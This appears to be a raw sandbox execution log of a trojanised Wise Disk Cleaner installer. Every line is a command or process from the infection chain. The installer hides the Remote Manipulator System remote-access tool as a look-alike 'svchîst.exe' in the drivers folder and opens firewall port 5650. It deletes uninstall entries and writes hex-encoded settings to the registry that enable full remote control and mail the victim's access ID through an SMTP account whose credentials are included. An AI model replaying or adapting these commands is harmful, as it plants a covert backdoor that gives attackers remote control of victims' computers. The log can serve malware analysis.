"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f& REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f& Exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f
C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
"C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe" /VERYSILENT /LANG=ru /TASKS=desktopicon
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 5650 "Open Port 5650"
C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp" /SL5="$40028,3793825,188928,C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe" /VERYSILENT /LANG=ru /TASKS=desktopicon
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650
C:\Windows\SysWOW64\drivers\install.exe
"C:\Windows\System32\drivers\install.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f
C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe
"C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe" "WDCSkipUAC" "C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /silentinstall
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Program Files\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\*.*"
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe
"C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\*.*"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c RMDIR /s/q "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Wise Disk Cleaner 10.3.6.788" /f
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /firewall
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Wise Disk Cleaner 10.3.6.788" /f
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /start
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\SysWOW64\drivers\svchîst.exe"
